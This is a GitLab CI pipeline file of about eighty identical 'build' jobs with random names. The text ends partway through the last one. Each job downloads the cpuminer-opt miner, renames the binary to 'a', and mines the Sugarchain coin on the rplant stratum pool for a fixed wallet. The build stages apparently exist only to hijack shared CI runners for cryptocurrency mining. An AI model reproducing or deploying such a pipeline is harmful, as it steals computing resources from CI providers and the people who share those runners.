build_jrtjjtgf8:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_fhhrehfdhj9:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_10jfrehfdte:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_hrgfdhfdhfdf11:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_j1jhfdyr2:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_j1hghfdhf3:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_154yrehfdhjh4:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_43rehfdh215:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_436ehfdh16:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_432rehfdh17:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_14hrhfd3428:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_143rehfd79:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_212reh0:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_hffdhfdde:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_hdregfdhst:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_gadgfddg:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_gfhdfdds:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_afdfggddgs:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_gfygfytytyg11:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1jgfyttyfgyhg2:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1jgfytfyg3:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_14ygfjgfy:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_15fygfygf:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_kgfytfygf16:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_kjgfytyg17:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1kgfytgygfj8:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1jgfytygf9:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_20gfjgfyt:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_21kjtyg:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2tjtjgfj2:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2fdfdjfgy3:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2gfytjtr4:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2jkgkkfyt5:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_ljkgfythm1:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2lhkfgytnm:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_3ljghyth:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_lyfgytjj4:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_yjkgfytl5:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_ljkgfyty6:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_lykgfytj7:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_8lukgfky:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_luykgfytt9:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1tktkfgtyi0:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1tjgkgfytf1:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1tjgfgfygfy2:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1tjtkgfytg3:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1gjtrjkgfty4:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1jgyjkgftyt5:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1hgjkfgyt6:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1gdkjgfytseg7:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1gdskfgyte8:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1gjkfgytds9:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2grjfgytre0:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2gsakfgyt1:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2fgajgkgf2:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2fjgfyta3:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2jgfytd4:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2sjgfytt5:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_jrtgjgfytffj1:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_jrtgjgftrf2:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_krtfgfytd3:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_rtjgjgftrfjk4:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_rtjgfgftrj5:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_jrtgfkfjg6:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_7gfjgjgtfgfg:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_jrgfjfyttj8:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_fhhgfjfgyj9:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_10jfgfjgfyte:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_hrgfgfjgfy11:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_j1jgfjgfyr2:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_j1jfgythgf3:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_154gfjgfyjh4:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_432fgjgfy15:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_436jfgy16:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_4321gfjgf7:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1434jgfyt28:
  stage: build
